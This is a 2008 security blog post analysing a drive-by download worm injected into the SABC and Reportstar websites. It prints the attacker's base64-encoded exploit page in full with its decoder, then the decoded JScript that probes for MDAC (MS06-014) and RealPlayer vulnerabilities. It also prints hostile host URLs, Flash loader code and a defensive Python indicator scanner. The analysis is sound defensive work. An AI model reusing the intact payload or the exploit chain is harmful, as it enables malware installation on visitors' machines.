Tuesday, June 3, 2008

Silent Love China - Reference to sabc.co.za and reportstar.net hax

After a bit of excitement in the office about yesterday’s post, we decided to do a bit of analysis on the worm that hit the SABC and Reportstar (time constraints applicable).

We used our limited time trying to find out exactly which htm, JavaScript, swf and exe files we could pull out, and what they actually did.

The files which we are currently storing in our lab are:

m.js – Entry injection page

1847687.js – “// A Popular Free Statistics Service for 100 000+ Webmasters.”

456.htm – Loads 4561 or 4562 (swf)

4561.swf – we decompiled this

4562.swf – we decompiled this too

am6.htm - links to both http://ph.errtys.org/ax14.htm and http://ph.errtys.org/re10.htm - also includes activex objects and iframes of http://ph.errtys.org/axlz.htm and http://ph.errtys.org/re11.htm .

ax14.htm – javascripts and vbscript

axlz.htm - more scripts

bak.exe – l33t Trojan

dj – base64

dj.htm – includes “by shadow MSN:[email protected] email:[email protected]” and the base64; uses the Microsoft Data Access Components (MDAC) function (MS06-014).

dj.output.base64.decode – output of the base64 – JScript and "Adodb.Stream"

re10.htm – Javascript + base64

re11.htm – Javascript – including the interesting text “fuckyoukaspersky”

All these files come from iframes or links in the source code, which all trace back to http://www.dota11.cn/m.js.

A fantastic sitemap by Jeremy Conway details things very well:

Now, if we take a look at dj.htm:

<.HTML>
<.BODY>
<.title>by shadow MSN:[email protected] email: [email protected]
<.script>
// Lookup table mapping ASCII codes to 6-bit base64 values (-1 = not a base64 character)
var base64DecodeChars=new Array(-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,62,-1,-1,-1,63,52,53,54,55,56,57,58,59,60,61,-1,-1,-1,-1,-1,-1,-1,0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,-1,-1,-1,-1,-1,-1,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,-1,-1,-1,-1,-1);
// Plain base64 decoder: the whole exploit script is shipped as one base64 string and
// only becomes readable JScript when this runs in the victim's browser
function base64decode(str){
    var c1,c2,c3,c4;
    var i,len,out;
    len=str.length;i=0;out="";
    while(i<len){
        do{c1=base64DecodeChars[str.charCodeAt(i++)&0xff]}while(i<len&&c1==-1);
        if(c1==-1)break;
        do{c2=base64DecodeChars[str.charCodeAt(i++)&0xff]}while(i<len&&c2==-1);
        if(c2==-1)break;
        out+=String.fromCharCode((c1<<2)|((c2&0x30)>>4));
        do{c3=str.charCodeAt(i++)&0xff;if(c3==61)return out;c3=base64DecodeChars[c3]}while(i<len&&c3==-1);
        if(c3==-1)break;
        out+=String.fromCharCode(((c2&0x0f)<<4)|((c3&0x3c)>>2));
        do{c4=str.charCodeAt(i++)&0xff;if(c4==61)return out;c4=base64DecodeChars[c4]}while(i<len&&c4==-1);
        if(c4==-1)break;
        out+=String.fromCharCode(((c3&0x03)<<6)|c4)
    }
    return out
}

document.write(base64decode ("PHNjcmlwdD53aW5kb3cub25lcnJvcj1mdW5jdGlvbigpe3JldHVybiB0cnVlO308L3NjcmlwdD4NCjxTY3JpcHQgTGFuZ3VhZ2U9IkpTY3JpcHQiPg0KCXZhciBjb29rID0gInNpbGVudHdtIjsNCgkNCglmdW5jdGlvbiBzZXRDb29raWUobmFtZSwgdmFsdWUsIGV4cGlyZSkgDQoJeyAgIA0KCQl3aW5kb3cuZG9jdW1lbnQuY29va2llID0gbmFtZSArICI9IiArIGVzY2FwZSh2YWx1ZSkgKyAoKGV4cGlyZSA9PSBudWxsKSA/ICIiIDogKCI7IGV4cGlyZXM9IiArIGV4cGlyZS50b0dNVFN0cmluZygpKSk7DQoJfQ0KDQoJZnVuY3Rpb24gZ2V0Q29va2llKE5hbWUpIA0KCXsgICANCgkJdmFyIHNlYXJjaCA9IE5hbWUgKyAiPSI7DQoJCWlmICh3aW5kb3cuZG9jdW1lbnQuY29va2llLmxlbmd0aCA+IDApIA0KCQl7IA0KCQkJb2Zmc2V0ID0gd2luZG93LmRvY3VtZW50LmNvb2tpZS5pbmRleE9mKHNlYXJjaCk7DQoJCQlpZiAob2Zmc2V0ICE9IC0xKSANCgkJCXsgDQoJCQkJb2Zmc2V0ICs9IHNlYXJjaC5sZW5ndGg7ICAgICAgIA0KCQkJICBlbmQgPSB3aW5kb3cuZG9jdW1lbnQuY29va2llLmluZGV4T2YoIjsiLCBvZmZzZXQpICAgICAgIA0KCQkJICBpZiAoZW5kID09IC0xKQ0KCQkJICAgIGVuZCA9IHdpbmRvdy5kb2N1bWVudC5jb29raWUubGVuZ3RoOw0KCQkJICByZXR1cm4gdW5lc2NhcGUod2luZG93LmRvY3VtZW50LmNvb2tpZS5zdWJzdHJpbmcob2Zmc2V0LCBlbmQpKTsNCgkJCSB9DQoJCSB9DQoJICByZXR1cm4gbnVsbDsNCgl9DQoNCglmdW5jdGlvbiByZWdpc3RlcihuYW1lKSANCgl7DQoJCXZhciB0b2RheSA9IG5ldyBEYXRlKCk7DQoJCXZhciBleHBpcmVzID0gbmV3IERhdGUoKTsNCgkJZXhwaXJlcy5zZXRUaW1lKHRvZGF5LmdldFRpbWUoKSArIDEwMDAqNjAqNjAqMjQpOw0KCQlzZXRDb29raWUoY29vaywgbmFtZSwgZXhwaXJlcyk7DQoJfQ0KDQoJZnVuY3Rpb24gb3BlbldNKCkgDQoJew0KCQl2YXIgYyA9IGdldENvb2tpZShjb29rKTsNCgkJaWYgKGMgIT0gbnVsbCkgDQoJCXsNCgkgIAlyZXR1cm47DQoJCX0NCgkJDQoJCXJlZ2lzdGVyKGNvb2spOw0KCQkNCgkJd2luZG93LmRlZmF1bHRTdGF0dXM9IuWujOaIkCI7DQoJCQkNCgkJdHJ5eyB2YXIgZTsNCgkJCXZhciBhZG89KGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoIm9iamVjdCIpKTsNCgkJCWFkby5zZXRBdHRyaWJ1dGUoImNsYXNzaWQiLCJjbHNpZDpCRDk2QzU1Ni02NUEzLTExRDAtOTgzQS0wMEMwNEZDMjlFMzYiKTsNCgkJCXZhciBhcz1hZG8uY3JlYXRlb2JqZWN0KCJBZG9kYi5TdHJlYW0iLCIiKX0NCgkJY2F0Y2goZSl7fTsNCgkJZmluYWxseXsNCgkJCWlmKGUhPSJbb2JqZWN0IEVycm9yXSIpew0KCQkJCWRvY3VtZW50LndyaXRlKCI8aWZyYW1lIHdpZHRoPTUwIGhlaWdodD0wIHNyYz0xNC5odG0+PC9pZnJhbWU+Iil9DQoJCQllbHNlDQoJCQl7CQ0KCQkJCXRyeXsgdmFyIGo7DQoJCQkJCXZhciByZWFsMTE9bmV3IEFjdGl2ZV
hPYmplY3QoIklFUlAiKyJDdGwuSSIrIkVSUEN0bC4xIik7fQ0KCQkJCWNhdGNoKGope307DQoJCQkJZmluYWxseXtpZihqIT0iW29iamVjdCBFcnJvcl0iKXtpZihuZXcgQWN0aXZlWE9iamVjdCgiSUVSUEN0bC5JRVJQQ3RsLjEiKS5QbGF5ZXJQcm9wZXJ0eSgiUFJPRFVDVFZFUlNJT04iKTw9IjYuMC4xNC41NTIiKQ0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHtkb2N1bWVudC53cml0ZSgnPGlmcmFtZSB3aWR0aD0xMCBoZWlnaHQ9MCBzcmM9cmwuaHRtPjwvaWZyYW1lPicpfQ0KICAgICAgICAgICAgICAgICAgICAgICAgIGVsc2UNCiAgICAgICAgICAgICAgICAgICAgICAgICB7DQoJCQkJCWRvY3VtZW50LndyaXRlKCc8aWZyYW1lIHdpZHRoPTEwIGhlaWdodD0wIHNyYz1uZXcuaHRtPjwvaWZyYW1lPicpfX19DQoNCgkJCQkJZG9jdW1lbnQud3JpdGUoJzxpZnJhbWUgd2lkdGg9NTAgaGVpZ2h0PTAgc3JjPTA0Lmh0bT48L2lmcmFtZT4nKQ0KDQoJCQkJaWYoaj09IltvYmplY3QgRXJyb3JdIikNCgkJCQl7bG9jYXRpb24ucmVwbGFjZSgiYWJvdXQ6YmxhbmsiKTt9DQoJCQl9fQ0KCX0NCg0Kb3BlbldNKCk7DQo8L3NjcmlwdD4="));

<./script>

<./BODY>

<./HTML>

We decoded this to the following script:

<.script>window.onerror=function(){return true;}<./script>    // swallow every script error so probing stays silent

<.Script Language="JScript">
    var cook = "silentwm";

    // Cookie helpers: the marker cookie makes the chain run only once per victim per 24 hours
    function setCookie(name, value, expire)
    {
        window.document.cookie = name + "=" + escape(value) + ((expire == null) ? "" : ("; expires=" + expire.toGMTString()));
    }

    function getCookie(Name)
    {
        var search = Name + "=";
        if (window.document.cookie.length > 0)
        {
            offset = window.document.cookie.indexOf(search);
            if (offset != -1)
            {
                offset += search.length;
                end = window.document.cookie.indexOf(";", offset);
                if (end == -1)
                    end = window.document.cookie.length;
                return unescape(window.document.cookie.substring(offset, end));
            }
        }
        return null;
    }

    function register(name)
    {
        var today = new Date();
        var expires = new Date();
        expires.setTime(today.getTime() + 1000*60*60*24);
        setCookie(cook, name, expires);
    }

    function openWM()
    {
        var c = getCookie(cook);
        if (c != null)
        {
            return;    // already hit within the last 24 hours
        }

        register(cook);

        window.defaultStatus = "完成";    // Chinese for "done"

        // Probe 1: RDS.DataSpace CLSID and Adodb.Stream (MDAC, MS06-014)
        try { var e;
            var ado = (document.createElement("object"));
            ado.setAttribute("classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
            var as = ado.createobject("Adodb.Stream", "");
        }
        catch(e) {};
        finally {
            if (e != "[object Error]") {
                document.write("");    // hidden iframe; target removed for the blog post
            }
            else
            {
                // Probe 2: RealPlayer IERPCtl control, branching on its version
                try { var j;
                    var real11 = new ActiveXObject("IERP" + "Ctl.I" + "ERPCtl.1");
                }
                catch(j) {};
                finally {
                    if (j != "[object Error]") {
                        if (new ActiveXObject("IERPCtl.IERPCtl.1").PlayerProperty("PRODUCTVERSION") <= "6.0.14.552")
                        {
                            document.write('');    // hidden iframe; target removed for the blog post
                        }
                        else
                        {
                            document.write('');    // hidden iframe; target removed for the blog post
                        }
                    }
                }
                document.write('');    // hidden iframe; target removed for the blog post

                if (j == "[object Error]")
                {
                    location.replace("about:blank");
                }
            }
        }
    }

    openWM();
<./script>

Bear in mind that when posting this on the blog we changed a couple of things in the source code, but in any event you should get the idea.

So, this is quite impressive: if your configuration does not raise any error when the Adodb.Stream object is created, you are directed to 14.htm.

From this point, the malicious binary and backdoor “bak.exe” will be downloaded to your computer via the MDAC vulnerability (if you are unpatched, that is).

If any errors do occur, a Real Player “hax” is checked for instead, and this covers several different versions and vulnerabilities.

Once again, if nothing is picked up and any errors occur, you will be taken to rl.htm and your machine will potentially be backdoored. I must stress that if it fails, it will check for several different Real Player vulnerabilities, some of which are much more recent (including heap spraying techniques). So, thanks to websites being vulnerable, the general public now has a big issue. Anyway...
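As an added defensive example (not code from the original post), the following Python triage script decodes the base64decode("...") payloads a page like dj.htm carries and flags the indicators discussed above; the sample HTML and inner script are constructed here to mirror dj.htm's structure, and the indicator labels are my own names.

```python
import base64
import re
# Constructed sample mirroring dj.htm: the page carries only a base64 string that a
# small decoder unpacks and document.write()s at load time.
INNER_SCRIPT = (
    '<script>window.onerror=function(){return true;}</script>'
    '<script>var cook="silentwm";'
    'var ado=document.createElement("object");'
    'ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");'
    'var as=ado.createobject("Adodb.Stream","");'
    'var r=new ActiveXObject("IERP"+"Ctl.I"+"ERPCtl.1");'
    'document.write("<iframe width=50 height=0 src=14.htm></iframe>");</script>'
)
SAMPLE_HTML = ('<html><body><script>document.write(base64decode("%s"));</script></body></html>'
               % base64.b64encode(INNER_SCRIPT.encode()).decode())
B64_CALL = re.compile(r'base64decode\s*\(\s*"([A-Za-z0-9+/=\s]+)"\s*\)')

# Indicator labels are my own; the patterns come from the dj.htm analysis above.
INDICATORS = {
    "error-suppression": re.compile(r"window\.onerror\s*=\s*function\s*\(\)\s*\{\s*return\s+true"),
    "rds-dataspace-clsid (MS06-014)": re.compile(r"BD96C556-65A3-11D0-983A-00C04FC29E36", re.I),
    "adodb.stream": re.compile(r"Adodb\.Stream", re.I),
    "realplayer-ierpctl": re.compile(r"IERPCtl", re.I),
    "hidden-iframe": re.compile(r"<iframe[^>]*height\s*=\s*0\b", re.I),
    "cookie-gate": re.compile(r'"silentwm"|document\.cookie', re.I),
}

def decode_payloads(html):
    """Return the decoded text of every base64decode("...") argument found in html."""
    decoded = []
    for m in B64_CALL.finditer(html):
        blob = re.sub(r"\s+", "", m.group(1))
        try:
            decoded.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a ValueError: skip anything that is not base64
            continue
    return decoded

def normalise(script):
    # Join split literals such as "IERP"+"Ctl.I"+"ERPCtl.1" so the real class name is visible.
    return re.sub(r'"\s*\+\s*"', "", script)

def triage(html):
    # Scan the raw page and every decoded layer; return the sorted indicator labels that hit.
    hits = set()
    for layer in [html] + decode_payloads(html):
        text = normalise(layer)
        hits.update(label for label, rx in INDICATORS.items() if rx.search(text))
    return sorted(hits)
```

Running triage() over the raw page alone finds nothing, which is the point: the indicators only appear after the base64 layer is unpacked and the split string literals are joined.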

123.htm contains the same script as dj.htm shown above (again edited for the blog post).

There are actually 2 separate files with the same content as above, but both of them are hosting malicious swf files. In addition, different files are loaded depending on which browser you use (i.e. 4561.swf and 4562.swf).

Decompiling the Flash objects produced ActionScript that loads other movies:

4561.swf

var fVersion = /:$version;
loadMovie('hxxp://www.woai117.cn/' + fVersion + 'i.swf', _root);
stop();

4562.swf

var fVersion = /:$version;
loadMovie('hxxp://www.woai117.cn/' + fVersion + 'f.swf', _root);
stop();

These load further swf files, with the file name built from the installed Flash Player version, which obviously target the Adobe Flash Player vulnerabilities. There are also other functions which load the Trojan “bak.exe” via RDS.DataControl (MS06-014), which we mentioned earlier.

Please take into account the severity of this issue and its obviously huge impact. The general end user who visits these websites is usually not up to date with versions of RealPlayer, Flash and, of course, Microsoft updates.

Take into account that this was also done in very little time, just to check the possible impact by visiting those two sites. If anyone wants a copy of the above files for any sort of analysis, please do let us know and we would be more than happy to send them across.

All users who visited sabc.co.za or reportstar.net in the last little while should be aware that if they had/have vulnerable versions of RealPlayer or Shockwave, or are unpatched for MS06-014, they are probably infected and carrying a backdoor. In addition to this, all the stats are well logged for the guys to see exactly what’s going on in their little game.
